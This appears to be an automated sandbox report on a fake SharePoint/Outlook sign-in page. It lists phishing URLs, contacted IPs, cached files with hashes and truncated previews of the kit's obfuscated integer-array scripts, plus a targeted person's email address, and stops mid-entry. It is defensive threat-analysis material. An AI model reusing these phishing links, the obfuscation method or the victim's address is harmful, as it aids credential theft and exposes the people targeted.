https://www.google.%/ads/ga-audiences	analytics[1].js.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.navigatormm.com	style[1].css.2.dr	false		high
http://www.gnu.org/licenses/gpl-2.0.html	style[1].css.2.dr	false		high
http://getbootstrap.com)	bootstrap.min[1].js.2.dr	false	Avira URL Cloud: safe	low
http://stackoverflow.com/questions/10387740/five-equal-columns-in-twitter-bootstrap/22799354#2279935	style[1].css0.2.dr	false		high
https://github.com/krux/postscribe/blob/master/LICENSE.	gtm[1].js.2.dr	false		high
https://github.com/twbs/bootstrap/blob/master/LICENSE)	bootstrap_002.js[1].js.2.dr, bootstrap.min[1].css.2.dr	false		high
http://stackoverflow.com/a/2866613	scripts[1].js.2.dr	false		high
https://stats.g.doubleclick.net/j/collect	analytics[1].js.2.dr	false		high
http://opensource.org/licenses/MIT).	popper.js[1].js.2.dr	false		high
https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=153958532	~DFF335FDC517C7DD21.TMP.1.dr	false	Avira URL Cloud: safe	unknown
https://www.premierpawappdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjk	{E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat.1.dr	false	Avira URL Cloud: safe	unknown
https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpRoot	{E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat.1.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
31.13.92.14	unknown	Ireland	32934	FACEBOOKUS	false
149.56.20.211	unknown	Canada	16276	OVHFR	false
169.46.89.154	unknown	United States	36351	SOFTLAYERUS	false
74.125.128.155	unknown	United States	15169	GOOGLEUS	false
172.67.212.166	unknown	United States	13335	CLOUDFLARENETUS	false
158.175.115.200	unknown	United States	36351	SOFTLAYERUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323643
Start date:	27.11.2020
Start time:	09:34:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 33s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	browseurl.jbs
Sample URL:	https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.phis.win@3/60@8/6
Cookbook Comments:	Adjust boot time Enable AMSI Browsing link: https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&email=dXpvaGlmZWFueWlAb3V0bG9vay5jb20=#home Browsing link: https://www.premierpawn.com/rrt/xxtb/sharepoints/sharepoints.php?wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&email=dXpvaGlmZWFueWlAb3V0bG9vay5jb20=#news
Warnings:	Show All Exclude process from analysis (whitelisted): ielowutil.exe, backgroundTaskHost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.193.48, 104.83.120.32, 52.147.198.201, 216.58.215.234, 172.217.168.10, 172.217.168.68, 172.217.16.168, 172.217.168.14, 172.217.22.35, 216.58.215.227, 51.104.139.180, 92.122.144.200, 152.199.19.161 Excluded domains from analysis (whitelisted): gstaticadssl.l.google.com, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, www.googletagmanager.com, www.google.com, watson.telemetry.microsoft.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, www.google-analytics.com, fonts.googleapis.com, fs.microsoft.com, www-google-analytics.l.google.com, ajax.googleapis.com, fonts.gstatic.com, ie9comview.vo.msecnd.net, www-googletagmanager.l.google.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, cs9.wpc.v0cdn.net Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\KP2WJQV6\www.google[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	960
Entropy (8bit):	5.610769556719442
Encrypted:	false
SSDEEP:	24:WUYI1XEYUYI1XEC237YUYI1XEC237kTFWrdiJlc1uTYUF237+:L7SB7SC2LB7SC2LkuQlcETBF2L+
MD5:	47E9300B4A6738A6F86F147AE60D0975
SHA1:	E9A277060448E5A1872A7A9A2DB5F41BA786B3C9
SHA-256:	CAC722A90F40A5D73E66C8B4C00B0CD9CE8CD0B81D61360D9E7E6427C624C836
SHA-512:	BABAC689411D72554C81C9989E7FC093AFD261A9D8C908B0E7CFACAAE2ED9D8837977EB6B9957BB9801BA6AFEE7D3D89970D85750B660186A66E704FE775B25E
Malicious:	false
Reputation:	low
Preview:	<root></root><root><item name="rc::d-1606498527348" value="dzl2NmdkMTFhNnRneA==" ltime="2983051392" htime="30852323" /></root><root><item name="rc::d-1606498527348" value="dzl2NmdkMTFhNnRneA==" ltime="2983051392" htime="30852323" /><item name="rc::a" value="MWsydG81bDFlcG5rMmE=" ltime="2983571392" htime="30852323" /></root><root><item name="rc::d-1606498527348" value="dzl2NmdkMTFhNnRneA==" ltime="2983051392" htime="30852323" /><item name="rc::a" value="MWsydG81bDFlcG5rMmE=" ltime="2983571392" htime="30852323" /><item name="rc::d-1606498527348-3f471f06" value="ChNyYzo6ZC0xNjA2NDk4NTI3MzQ4EAAaCDI3ZTA4ZjUyIpIBCokBYmE2cDhheXR2d1RPV004UjZQbktibHBObnZYZDBlQ2RtZ21YTnpYbVpaalI4cW5qUXNhUDJMVzF6bFRjdk56MTFlVHQ3dXo1dWE3cDJkWFNyYzhSemltWnVhQ29tYUNlOUxDbDhlalUtT1dubllLTjNZU3lyLXBscnNtZHdrUF9WcW5LV2RYbHcQyd7u5AEqAjFy" ltime="2984911392" htime="30852323" /></root><root><item name="rc::a" value="MWsydG81bDFlcG5rMmE=" ltime="2983571392" htime="30852323" /></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E1A2634D-30D6-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	30296
Entropy (8bit):	1.8543964022025154
Encrypted:	false
SSDEEP:	96:rXZ8ZB2+9W+jt+Nf+OzFM+++Mq+E2f+ELGMX:rXZ8ZB2+9WUtyfXFMbECf+MX
MD5:	DD9FA2A803B3A063B7225A3B63BFDD8A
SHA1:	A6C652E27EE273800325A545524502342D43E40B
SHA-256:	5C5AB864C92D2363C08A71D957D81774A1F730E25FBB3D70E7E2B38113EB6D6A
SHA-512:	AD8B0A6892E487AAE7ECC0456F33D0B4FAE5891EF0FDA139D457904AE797716BE3417382A42CE50253ED2B97C594CDF238FC230B3A97A5F8A22BD4A33DBF208C
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E1A2634F-30D6-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	69556
Entropy (8bit):	2.936934727464813
Encrypted:	false
SSDEEP:	384:rIEW9UhVNDd7CrEg1J3SaAKcPMcTNg1J32XWucPJDcb9bL4nucPiTxR5cPdTbe3M:rOzWTG
MD5:	1EABBDBA7A4D54F49117E1524E70CF21
SHA1:	38B5007A274F7B104D427F6287958A8A14EA4942
SHA-256:	1FD10557B55E1CBC04A466D09A67A1CF2FBEA6D2CFA2A3C695B1DAE09A6EDE98
SHA-512:	BD994AF05BD54672FE71D2E36677C54CC81E5342DBF1AF025416DFECA9B47428956BA33093F7AC68D5BD7DEA8D8758224903822A37995FE574912086CB6D8332
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E7B4DF9B-30D6-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5661696676314594
Encrypted:	false
SSDEEP:	48:IwuGcprXGwpaUG4pQMGrapbStrGQpK/G7HpRmsTGIpG:ryZBQk6KBStFAOTm4A
MD5:	FDC62054608E7755086A0D3E4D5E5EBE
SHA1:	405870AF3A9F0D26EAE2FC41C066111C5371BC36
SHA-256:	1B55536A9CC554A0DFF91AE74F5F6442A84E9DA0F73D493A715EDBD1BBE172FD
SHA-512:	5325A62B0AD781FC798EAAC24741C20C0EB3A0230DEAF9AC4F234C0050FD03D5C8A3EA112D87E47234635D7517559A6F7743F5B428D15B4725532606AE6A4BA0
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	9393
Entropy (8bit):	7.863084170416255
Encrypted:	false
SSDEEP:	192:BTKpI47oQMFSs7bnQXc5Muu1Sl7LfjXlCgDGUkrudc75:BTSI4JVs/Q+Muu0jXlCXUpc75
MD5:	63AF82FA81262C3AFEA6DDF37E5DF4CB
SHA1:	61A68CEA3C286A914C5A72E8D9C81B44FF4B0E82
SHA-256:	3DC78268FBD2F3FA20FF6C33F6254B09006DDD1FFE052910E1B6D10AF39C2BB1
SHA-512:	61E8BE71BDB2889FF087FB3689BABD59532E6E6C363691F1F46AA75D723DB2F4C138A65E1AA9A9979DB14F0ADB3527391F5C58AF64FBB430491DFAC9A0FEE4E2
Malicious:	false
Reputation:	low
Preview:	b.h.t.t.p.:././.i.c.o.n.s...i.c.o.n.a.r.c.h.i.v.e...c.o.m./.i.c.o.n.s./.d.a.k.i.r.b.y.3.0.9./.s.i.m.p.l.y.-.s.t.y.l.e.d./.2.5.6./.M.i.c.r.o.s.o.f.t.-.S.h.a.r.e.P.o.i.n.t.-.2.0.1.3.-.i.c.o.n...p.n.g..#...PNG........IHDR.............\r.f..#.IDATx...\|......I...-g.%g.Z.^.J6.Plm..VI....W[m}.....l..z..%..JE..X..xp.Kn......=4b.<..;3......n6yf.y2.w.g..<..a......a...0....0....0....0....0....0....0....0....0....0....0....0....0....0....0....0......"o;z........_}.\|.c...a...c....\|."owz..M.A.i.....'-........%..$..1;.L....J.7.vo:...O#.H..GBT~..I.....0..`oX.N...]............z....X....P.bo.:.g.....&....Og{.2d.,.e`..b..^{Qe.H.F.t.3{.....G\...P..........h.kT.u..6.E..}....P....(.v..L:.S..D.^Tvq...-...^...2.....3..p.T.\|..~....a.(.u.2.(Z&....pC.4...C......I..P...../.>....T..U.`.]\|.}.t..g.,.e`..B.n...P.>T..]....S...2..ZB.d.^..t.".&....E..kl+.!,.e`..O.6T*.\.P3>....`...-...%`.(...P....._.aT.G...#t.....Y...28C.E"jN....Se..Vt.b..h..7jNEX......i.[}h..\|T..........S...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\4iCv6KVjbNBYlgoCjC3jsGyL[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 34688, version 1.1
Category:	downloaded
Size (bytes):	34688
Entropy (8bit):	7.986115721268171
Encrypted:	false
SSDEEP:	768:CWTSXkeRsSmoRuwJGmgECluO64YI1viXgV8P/tRl8bAysSGhl:/2NmoYlm///I1vURPKAysZl
MD5:	E5613B0C875443174F948840C8CE07F6
SHA1:	92E91634568F4AF1FC4B661E251B668602B4DECF
SHA-256:	C5FF97625C996FD2A765D4319EDA3F15CA19BF66B33080E94465493E8EC27FD8
SHA-512:	F44DC7A1C33659F35E01340AF36E83FD0E4B375FB2F9890FC48543F4050BFF193D8CA4F5AA9B33A560654BDAFA63B0208A7A300C5125C02A2C92453A8BCD04CF
Malicious:	false
Reputation:	low
IE Cache URL:	https://fonts.gstatic.com/s/ubuntu/v15/4iCv6KVjbNBYlgoCjC3jsGyL.woff
Preview:	wOFF........................................GPOS..........8.3u..GSUB.............G.=OS/2.......Z...`f.q.VDMX.............B.,cmap...............@cvt .............h.#fpgm...,...z...#v.D.gasp................glyf......V....T.\|m,hdmx..p....k........head..~<...6...6...bhhea..~t... ...$...`hmtx..~....2...,M.,loca..............#maxp....... ... ....name...........d..5.post.......k...j...prep...$...Y....m'..x...p.Y..?9N.....e.cffff.:ffff./3..!.d.-....W.d.b/.pK.W=jAM{z.....!...X......4..m.\|=K...w...TcH.`"7'.....o{.Mn..m7.........Ky..a>....;.f...5.]T.A..<...x.O.E<."@.S8.......@5.....$j....,;...A.]..G.e...U5o..ZNi..F...T..iTI.h.....`qT#.a..~%,2J2......a1h@I........"4X...4....P.:.J....v.;...d.PNyet.....t<H.s..~%B.4.......+...$.y....T\....@..........4...)1?..*.J.}......J'.C...FH.5....?i'.nSJ;}^`.(......l...q..&.8........j1.. ..uy\....,.....}.........<.\|t............M......z.C)3....i'4..E.F\...v....d..j\|.g]o.;....:%.RN[@.FT.U...Z...fe.j......e..Jy.SQ7(..JQK7.,.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\bootstrap.js[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	51039
Entropy (8bit):	5.247253437401007
Encrypted:	false
SSDEEP:	768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
MD5:	67176C242E1BDC20603C878DEE836DF3
SHA1:	27A71B00383D61EF3C489326B3564D698FC1227C
SHA-256:	56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
SHA-512:	9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/index_files/bootstrap.js.download
Preview:	/!. Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable\|\|!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\css[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	201
Entropy (8bit):	5.134985290828669
Encrypted:	false
SSDEEP:	3:0SYWFFWlIYCEZwF5QRI5XwDKLRIHDfFQW2LRI9j9v7fqzrZqcdFtj8MUt9kUYARY:0IFF75Q+56Z4qh7izlpdFqMO9JNin
MD5:	A5BF1276EA34EA6EA695F4E772905480
SHA1:	F6C139D41AA681046830BB7B8809EB55AEA19731
SHA-256:	99D27B3C9574DDF2C4FD64FB8B51F348C3E697C469272E245976C1B7AC334320
SHA-512:	93A597201F97B5A73B425B94C9C9F941C8C99F28F26B9E2BEBAADED349E9D531BC8CF1393AEE60D7CFAFEB07200A71164D9EB30B75820A48882E3C1A878891F6
Malicious:	false
Reputation:	low
IE Cache URL:	https://fonts.googleapis.com/css?family=Ubuntu:500&display=swap
Preview:	@font-face {. font-family: 'Ubuntu';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/ubuntu/v15/4iCv6KVjbNBYlgoCjC3jsGyL.woff) format('woff');.}.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\jquery.ui.touch-punch.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	1291
Entropy (8bit):	5.2438790660600905
Encrypted:	false
SSDEEP:	24:NVNdp+zAgbf6E5Cbx7pCHHrw6dJElttJQSXxtR/MSFQEIYiQEHfn:NVNd8YtgFEJkVEImE/
MD5:	700B877CD3ADE98CE6CD4BE349D81A5C
SHA1:	C1C36E6927436231EB20474356B29667C4C648AA
SHA-256:	000854D782781AFF1B16EA5451C1DA3D07EFADD35AB911CCB7E4B851571A25BD
SHA-512:	D1B12D2B451235DF7A3273B85E11FC8E1BF79F2445D1E2BCEE92647BAA6461FDDC334B83221349CBD96DBB3AA0CA9A08157C37252BA2CB4E2D564E008E965D67
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/plugins/nav-commerce/js/jquery.ui.touch-punch.min.js
Preview:	/!. jQuery UI Touch Punch 0.2.3. . Copyright 2011.2014, Dave Furfero. * Dual licensed under the MIT or GPL Version 2 licenses.. . Depends:. * jquery.ui.widget.js. * jquery.ui.mouse.js. */.!function(a){function f(a,b){if(!(a.originalEvent.touches.length>1)){a.preventDefault();var c=a.originalEvent.changedTouches[0],d=document.createEvent("MouseEvents");d.initMouseEvent(b,!0,!0,window,1,c.screenX,c.screenY,c.clientX,c.clientY,!1,!1,!1,!1,0,null),a.target.dispatchEvent(d)}}if(a.support.touch="ontouchend"in document,a.support.touch){var e,b=a.ui.mouse.prototype,c=b._mouseInit,d=b._mouseDestroy;b._touchStart=function(a){var b=this;!e&&b._mouseCapture(a.originalEvent.changedTouches[0])&&(e=!0,b._touchMoved=!1,f(a,"mouseover"),f(a,"mousemove"),f(a,"mousedown"))},b._touchMove=function(a){e&&(this._touchMoved=!0,f(a,"mousemove"))},b._touchEnd=function(a){e&&(f(a,"mouseup"),f(a,"mouseout"),this._touchMoved\|\|f(a,"click"),e=!1)},b._mouseInit=function(){var b=this;b.element.bind({touch

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\logo_48[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:	48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.gstatic.com/recaptcha/api2/logo_48.png
Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\magiczoom[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	26772
Entropy (8bit):	5.80906128263299
Encrypted:	false
SSDEEP:	768:6+hfJmfNdbXlXn4JPvwg0jcwxFxH+sbof5ZlzO8diI:6+hhYNBJ4hvScwVecOpzB
MD5:	549038A8E834E2988F9B7B7D7D7AD953
SHA1:	9FE0D06496A55C6BAEF23A837C530B4B09BD21C6
SHA-256:	B7A371259A52F5EC0E5E1E0F582F80FCA1CB842462ADD58607C4B98AAD3C181B
SHA-512:	8B9C659CB5A0280CE251A00E8E175C20A0951E1AD538E9551738606471F676BD3792C8B8B65004F1524981045019C7F4C29E11EB76ECE42AB6472E582433125B
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/plugins/nav-commerce/modules/magiczoom/magiczoom.js
Preview:	/... Magic Zoom v3.1.29 . Copyright 2011 Magic Toolbox. Buy a license: www.magictoolbox.com/magiczoom/. License agreement: http://www.magictoolbox.com/license/.../.eval(function(m,a,g,i,c,k){c=function(e){return(e<a?'':c(parseInt(e/a)))+((e=e%a)>35?String.fromCharCode(e+29):e.toString(36))};if(!''.replace(/^/,String)){while(g--){k[c(g)]=i[g]\|\|c(g)}i=[function(e){return k[e]}];c=function(){return'\\w+'};g=1};while(g--){if(i[g]){m=m.replace(new RegExp('\\b'+c(g)+'\\b','g'),i[g])}}return m}('(q(){p(N.5Y){r}w a={34:"9i.4.3",6O:0,3f:{},$54:q(c){r(c.$2g\|\|(c.$2g=++$J.6O))},4l:q(c){r($J.3f[c]\|\|($J.3f[c]={}))},$F:q(){},$B:q(){r B},1s:q(c){r(1c!=c)},9k:q(c){r!!(c)},23:q(c){p(!$J.1s(c)){r B}p(c.$1E){r c.$1E}p(!!c.2l){p(1==c.2l){r"4E"}p(3==c.2l){r"6K"}}p(c.1o&&c.4L){r"9x"}p(c.1o&&c.3O){r"1b"}p((c 1Q N.9w\|\|c 1Q N.4Y)&&c.30===$J.2M){r"4V"}p(c 1Q N.2P){r"33"}p(c 1Q N.4Y){r"q"}p(c 1Q N.56){r"4a"}p($J.G.1u){p($J.1s(c.6i)){r"2J"}}V{p(c 1Q N.58\|\|c===N.2J\|\|c.30==N.9B){r"2J"}}p(c 1Q N.5T){r"62"}p

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\myscr408434[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	108129
Entropy (8bit):	4.242872420993695
Encrypted:	false
SSDEEP:	1536:f5d7DZ/s7eZouYJwk0H8XqJni1Zn49GNyyITKycUnLgy7pqTiJyHDt:x/e5uYJwk3XqJ6Zn4Gcz3LgyDJyHDt
MD5:	166CBD31FF41EFBCD36AB492D6E8EF0D
SHA1:	534EF601C26E73B856776E2A9F4B60D824268836
SHA-256:	85F15AD877A5AA9B57A6321E48745DAF51831FAFE863A348368A5C8602D21B1B
SHA-512:	E393EADB040DFD19DCB19A38541F9A5786C7DA8C2EFEEA9F61AA8B51768391D9CB43750CFE834D9F03A1F585AD3D47DBF67358D4E9F9077845D84116A8434B32
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/myscr408434.js
Preview:	var erp = new Array;.erp[0] = 1013213558;.erp[1] = 543386721;.erp[2] = 1936932130;.erp[3] = 1768777571;.erp[4] = 1869509729;.erp[5] = 1768842610;.erp[6] = 574491914;.erp[7] = 538976288;.erp[8] = 538983539;.erp[9] = 1885433376;.erp[10] = 1869505388;.erp[11] = 1768123197;.erp[12] = 577007459;.erp[13] = 1970103662;.erp[14] = 1949198181;.erp[15] = 1950706789;.erp[16] = 1835363956;.erp[17] = 1115244900;.erp[18] = 673588019;.erp[19] = 960194916;.erp[20] = 808527395;.erp[21] = 859388713;.erp[22] = 779318393;.erp[23] = 1818570340;.erp[24] = 1769173100;.erp[25] = 1635335462;.erp[26] = 590559547;.erp[27] = 1852796517;.erp[28] = 639841081;.erp[29] = 992092259;.erp[30] = 1818325875;.erp[31] = 1025663852;.erp[32] = 1869833506;.erp[33] = 544500084;.erp[34] = 1818574114;.erp[35] = 1131179891;.erp[36] = 1696615791;.erp[37] = 1684106274;.erp[38] = 1053005628;.erp[39] = 796094561;.erp[40] = 1849560330;.erp[41] = 538976288;.erp[42] = 538983529;.erp[43] = 1835475059;.erp[44] = 1919106338;.erp[45] = 168410

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\myscr631018[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	24645
Entropy (8bit):	4.3595924808973
Encrypted:	false
SSDEEP:	384:of5W6Vsj/zQ8tGQsZjIrEFchfi/NhMYbsfcv/YGK9/6W32F5I2FMB2hPSL:C5W5/zQ8tGQMcrNsMRUH6ptlVL
MD5:	699027FAA2E349217C03E9C971C45855
SHA1:	2C7AD08C9EC4DACE34110ABF997DCABE811BEDB7
SHA-256:	6CCB21762484968A3E2D3064B3D0616458266EDACAC262FC3430D95DAE1C89C7
SHA-512:	43A92BEEC5FD9714D13E5E18E9E37053EA2226979E109BBC0673418ECFF3A042945C1A44F27F4ABD552BE6B46CBF4A90B74C7BE5312313E007ACD5F6BC14C01E
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/myscr631018.js
Preview:	var erp = new Array;.erp[0] = 1013084734;.erp[1] = 218767392;.erp[2] = 538976288;.erp[3] = 1013542512;.erp[4] = 1970544756;.erp[5] = 2037409085;.erp[6] = 577790323;.erp[7] = 1937207154;.erp[8] = 1679958128;.erp[9] = 1818321765;.erp[10] = 1752132708;.erp[11] = 1701985570;.erp[12] = 1164866661;.erp[13] = 1914720353;.erp[14] = 1936947055;.erp[15] = 1919164960;.erp[16] = 1851878757;.erp[17] = 1025667169;.erp[18] = 1936947044;.erp[19] = 572549476;.erp[20] = 1025667169;.erp[21] = 1936947055;.erp[22] = 1919164960;.erp[23] = 1919250805;.erp[24] = 1769104740;.erp[25] = 1025647166;.erp[26] = 218767392;.erp[27] = 538976288;.erp[28] = 538983522;.erp[29] = 1916669194;.erp[30] = 538976288;.erp[31] = 538983522;.erp[32] = 1970566255;.erp[33] = 1847620729;.erp[34] = 1885682978;.erp[35] = 1937072749;.erp[36] = 1769218592;.erp[37] = 1768176930;.erp[38] = 1937072749;.erp[39] = 1769221474;.erp[40] = 1953374782;.erp[41] = 1129270868;.erp[42] = 1229870405;.erp[43] = 1009738357;.erp[44] = 1953787758;.erp[45]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\script[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
